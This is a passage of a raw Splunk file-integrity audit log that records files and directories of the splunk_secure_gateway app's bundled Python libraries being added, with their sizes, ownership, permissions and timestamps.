user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/modular_input/__pycache__/modular_input.cpython-37.pyc", isdir=0, size=14577, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.805, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/modular_input/__pycache__/event_writer.cpython-37.pyc", isdir=0, size=12182, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.799, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/modular_input/__pycache__/event.cpython-37.pyc", isdir=0, size=6593, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.792, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/modular_input/__pycache__/checkpointer.cpython-37.pyc", isdir=0, size=9324, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.787, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/modular_input/__pycache__/__init__.cpython-37.pyc", isdir=0, size=819, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.682, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/modular_input/modular_input.py", isdir=0, size=17447, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.679, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/modular_input/event_writer.py", isdir=0, size=14144, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.674, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/modular_input/event.py", isdir=0, size=7023, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.669, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/modular_input/checkpointer.py", isdir=0, size=8807, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.665, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/modular_input/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:34.660, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/modular_input/__init__.py", isdir=0, size=855, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.653, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__pycache__/utils.cpython-37.pyc", isdir=0, size=5027, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.647, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__pycache__/user_access.cpython-37.pyc", isdir=0, size=27068, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.643, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__pycache__/timer_queue.cpython-37.pyc", isdir=0, size=10049, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.637, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__pycache__/time_parser.cpython-37.pyc", isdir=0, size=3659, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.633, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__pycache__/splunkenv.cpython-37.pyc", isdir=0, size=6365, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.626, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__pycache__/splunk_rest_client.cpython-37.pyc", isdir=0, size=5497, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.622, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__pycache__/server_info.cpython-37.pyc", isdir=0, size=6874, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.616, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__pycache__/pattern.cpython-37.pyc", isdir=0, size=996, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.609, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__pycache__/orphan_process_monitor.cpython-37.pyc", isdir=0, size=3172, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.604, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__pycache__/net_utils.cpython-37.pyc", isdir=0, size=3253, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.599, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__pycache__/metadata.cpython-37.pyc", isdir=0, size=3144, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.596, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__pycache__/log.cpython-37.pyc", isdir=0, size=6493, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.592, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__pycache__/ip_math.cpython-37.pyc", isdir=0, size=5708, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.588, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__pycache__/hec_config.cpython-37.pyc", isdir=0, size=5797, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.585, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__pycache__/file_monitor.cpython-37.pyc", isdir=0, size=3641, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.582, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__pycache__/credentials.cpython-37.pyc", isdir=0, size=9236, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.577, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__pycache__/conf_manager.cpython-37.pyc", isdir=0, size=13098, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.574, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__pycache__/compression.cpython-37.pyc", isdir=0, size=3234, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.570, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__pycache__/acl.cpython-37.pyc", isdir=0, size=5100, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.567, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__pycache__/__init__.cpython-37.pyc", isdir=0, size=846, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:34.361, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/utils.py", isdir=0, size=5128, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.358, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/user_access.py", isdir=0, size=29902, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.354, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/timer_queue.py", isdir=0, size=9803, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.350, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/time_parser.py", isdir=0, size=3407, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.347, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/splunkenv.py", isdir=0, size=7532, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.342, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/splunk_rest_client.py", isdir=0, size=6502, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.337, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/server_info.py", isdir=0, size=6488, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.333, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/pattern.py", isdir=0, size=721, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.330, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/orphan_process_monitor.py", isdir=0, size=2697, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.326, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/net_utils.py", isdir=0, size=3127, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.321, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/modular_input", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:34.315, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/metadata.py", isdir=0, size=3067, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.310, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/log.py", isdir=0, size=7293, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.306, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/ip_math.py", isdir=0, size=9991, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.301, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/hec_config.py", isdir=0, size=5506, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.295, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/file_monitor.py", isdir=0, size=3341, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.290, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/credentials.py", isdir=0, size=11379, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.285, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/conf_manager.py", isdir=0, size=14657, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.280, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/compression.py", isdir=0, size=2948, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.276, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/api_documenter.py", isdir=0, size=22455, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.272, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/acl.py", isdir=0, size=5476, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.266, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:34.262, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib/__init__.py", isdir=0, size=871, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.057, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/typing_extensions-3.7.4.3.dist-info/top_level.txt", isdir=0, size=18, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.050, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/typing_extensions-3.7.4.3.dist-info/WHEEL", isdir=0, size=92, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.044, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/typing_extensions-3.7.4.3.dist-info/RECORD", isdir=0, size=679, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.040, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/typing_extensions-3.7.4.3.dist-info/METADATA", isdir=0, size=2020, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.034, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/typing_extensions-3.7.4.3.dist-info/LICENSE", isdir=0, size=12755, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:34.030, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/typing_extensions-3.7.4.3.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.924, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/importlib_metadata-3.10.0.dist-info/top_level.txt", isdir=0, size=19, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.920, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/importlib_metadata-3.10.0.dist-info/WHEEL", isdir=0, size=92, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.917, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/importlib_metadata-3.10.0.dist-info/RECORD", isdir=0, size=1375, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.913, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/importlib_metadata-3.10.0.dist-info/METADATA", isdir=0, size=3500, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.908, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/importlib_metadata-3.10.0.dist-info/LICENSE", isdir=0, size=571, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.903, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/importlib_metadata-3.10.0.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.900, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl-1.6.3.dist-info/top_level.txt", isdir=0, size=5, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.896, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl-1.6.3.dist-info/WHEEL", isdir=0, size=112, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.892, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl-1.6.3.dist-info/RECORD", isdir=0, size=1414, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.888, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl-1.6.3.dist-info/METADATA", isdir=0, size=18960, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.883, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl-1.6.3.dist-info/LICENSE", isdir=0, size=11368, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.879, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl-1.6.3.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.775, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/fix_unpacking.py", isdir=0, size=5946, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.771, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/fix_throw.py", isdir=0, size=835, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.768, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/fix_raise_.py", isdir=0, size=1225, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.763, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/fix_raise.py", isdir=0, size=1099, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.759, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/fix_printfunction.py", isdir=0, size=401, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.751, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/fix_next.py", isdir=0, size=1233, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.747, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/fix_newstyle.py", isdir=0, size=888, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.743, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/fix_metaclass.py", isdir=0, size=3260, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.739, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/fix_memoryview.py", isdir=0, size=551, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.735, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/fix_kwargs.py", isdir=0, size=5991, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.731, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/fix_imports2.py", isdir=0, size=8580, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.726, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/fix_imports.py", isdir=0, size=4944, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.722, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/fix_getcwd.py", isdir=0, size=873, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.718, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/fix_future_builtins.py", isdir=0, size=1450, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.714, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/fix_fullargspec.py", isdir=0, size=438, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.711, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/fix_features.py", isdir=0, size=2675, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.707, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/fix_division.py", isdir=0, size=904, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.703, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/fix_annotations.py", isdir=0, size=1581, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.700, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/fix_add_future_standard_library_import.py", isdir=0, size=663, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.696, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/fix_add_all_future_builtins.py", isdir=0, size=1269, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.692, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/fix_add_all__future__imports.py", isdir=0, size=676, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.689, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/feature_base.py", isdir=0, size=1723, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.685, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes/__init__.py", isdir=0, size=3719, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.481, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/main.py", isdir=0, size=8186, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.477, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/fixes", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:33.472, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize/__init__.py", isdir=0, size=31, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.468, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl/__pycache__/_url.cpython-37.pyc", isdir=0, size=26570, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:33.464, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl/__pycache__/_quoting.cpython-37.pyc", isdir=0, size=486, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:33.459, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl/__pycache__/__init__.cpython-37.pyc", isdir=0, size=292, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:33.455, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl/py.typed", isdir=0, size=13, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.451, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl/_url.py", isdir=0, size=36016, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.447, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl/_quoting_py.py", isdir=0, size=6386, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.443, user=n/a, 